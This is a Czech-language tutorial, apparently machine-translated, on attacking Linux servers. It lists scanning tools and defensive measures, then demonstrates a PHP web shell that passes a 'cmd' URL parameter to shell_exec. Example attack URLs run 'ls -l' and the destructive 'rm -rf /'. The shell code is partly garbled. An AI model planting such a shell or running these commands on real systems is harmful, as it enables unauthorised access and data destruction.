Hacking Linux OS: Hacking s Ubuntu (Výukový program pro příkazy)

Obsah:

Anonim

Linux je nejpoužívanějším operačním systémem serverů, zejména pro webové servery. Je to otevřený zdroj; to znamená, že kdokoli může mít přístup ke zdrojovému kódu. Díky tomu je ve srovnání s jinými operačními systémy méně bezpečný, protože útočníci mohou studovat zdrojový kód a vyhledat slabá místa . Linux pro hackery je o zneužití těchto chyb zabezpečení k získání neoprávněného přístupu k systému.

V tomto článku vám představíme, co je Linux, jeho bezpečnostní chyby, hacking s Ubuntu a protiopatření, která můžete zavést.

Témata obsažená v tomto kurzu

  • Rychlá poznámka pro Linux
  • Hackerské nástroje pro Linux
  • Jak zabránit hackování Linuxu
  • Hackerská aktivita: Hackněte systém Linux pomocí PHP

Rychlá poznámka pro Linux

Linux je operační systém s otevřeným zdrojovým kódem . Existuje mnoho distribucí operačních systémů založených na Linuxu, jako jsou Redhat, Fedora a Ubuntu atd. Na rozdíl od jiných operačních systémů je Linux z hlediska bezpečnosti méně bezpečný. Důvodem je to, že zdrojový kód je k dispozici volně, takže je snadné jej prozkoumat na slabá místa a zneužít je ve srovnání s jinými operačními systémy, které nejsou open source. Linux lze použít jako server, počítač, tablet nebo operační systém pro mobilní zařízení.

Programy pro Linux lze ovládat pomocí grafického uživatelského rozhraní nebo příkazů. Linuxové příkazy pro hackování systému Kali Linux jsou efektivnější a efektivnější ve srovnání s použitím grafického uživatelského rozhraní. Z tohoto důvodu pomáhá znát základní linuxové příkazy pro hackování.

V těchto návodech https://www.guru99.com/unix-linux-tutorial.html najdete informace o tom, jak začít s hacky systému Kali Linux.

Hackerské nástroje pro Linux

  • Nessus - tento nástroj lze použít pro hackování Ubuntu, nastavení konfigurace skenování, opravy a sítě atd., Lze jej najít na https://www.tenable.com/products/nessus
  • NMap. Tento nástroj lze použít k monitorování hostitelů spuštěných na serveru a služeb, které využívají. Lze jej také použít ke skenování portů. Najdete jej na https://nmap.org/
  • SARA - SARA je zkratka pro výzkumného asistenta bezpečnostního auditora. Jak název napovídá, tento nástroj lze použít k auditu sítí proti hrozbám, jako je SQL Injection, XSS atd., Lze jej najít na adrese http://www-arc.com/sara/sara.html

Výše uvedený seznam není vyčerpávající; poskytuje představu o dostupných nástrojích pro hackování Ubuntu a hackování systémů Linux.

Jak zabránit hackování Linuxu

Linux Hacking využívá slabých míst v operačním systému. Organizace může přijmout následující zásady, aby se chránila před takovými útoky.

  • Správa oprav - opravy opravují chyby, které útočníci zneužijí k narušení systému. Dobrá politika správy oprav zajistí, že budete do svého systému neustále aplikovat příslušné opravy.
  • Správná konfigurace operačního systému - ostatní zneužití využívají slabých stránek v konfiguraci serveru. Neaktivní uživatelská jména a démoni by měli být deaktivováni. Měla by se změnit výchozí nastavení, jako jsou běžná hesla k aplikaci, výchozí uživatelská jména a některá čísla portů.
  • Systém detekce narušení - takové nástroje lze použít k detekci neoprávněného přístupu do systému. Některé nástroje mají schopnost takové útoky detekovat a předcházet jim.

Hackerská aktivita: Hackněte systém Linux Linux pomocí PHP

V tomto praktickém scénáři se naučíme hackovat s Ubuntu a poskytneme vám základní informace o tom, jak můžete pomocí PHP ohrozit Linux. Nechystáme se zaměřit na žádnou oběť. Pokud si to chcete vyzkoušet, můžete si nainstalovat LAMPP na svůj místní počítač.

PHP přichází se dvěma funkcemi, které lze použít k provádění hackerských příkazů Linuxu. Má funkce exec () a shell_exec (). Funkce exec () vrací poslední řádek výstupu příkazu, zatímco shell_exec () vrací celý výsledek příkazu jako řetězec.

Pro demonstrační účely předpokládejme, že manažeři útočníků nahrají následující soubor na webový server.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

TADY,

Výše uvedený skript získá příkaz z proměnné GET s názvem cmd. Příkaz se provádí pomocí shell_exec () a výsledky se vrátí v prohlížeči.

Výše uvedený kód lze zneužít pomocí následující adresy URL

http: //localhost/cp/konsole.php? cmd = ls% 20-l

TADY,

  • „… Konsole.php? Cmd = ls% 20-l“ přiřadí hodnotě ls -l proměnné cmd .

Příkaz v Ubuntu pro hackování proti serveru bude proveden jako

shell_exec('ls -l') ;

Provedení výše uvedeného kódu na webovém serveru poskytuje výsledky podobné následujícím.

Výše uvedený příkaz jednoduše zobrazí soubory v aktuálním adresáři a oprávnění

Předpokládejme, že útočník předá následující příkaz

rm -rf /

TADY,

  • „Rm“ odebere soubory
  • „Rf“ provede příkaz rm v rekurzivním režimu. Odstranění všech složek a souborů
  • “/” Dá příkazu příkaz k zahájení mazání souborů z kořenového adresáře

URL útoku by vypadalo nějak takto

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

souhrn

  • Linux je oblíbený operační systém pro servery, stolní počítače, tablety a mobilní zařízení.
  • Linux je otevřený zdrojový kód a zdrojový kód může získat kdokoli. To usnadňuje odhalení zranitelností. Je to jeden z nejlepších OS pro hackery.
  • Základní a síťové hackerské příkazy v Ubuntu jsou cenné pro linuxové hackery.
  • Zranitelnosti jsou slabinou, kterou lze zneužít k narušení systému.
  • Dobré zabezpečení může pomoci chránit systém před napadením útočníkem.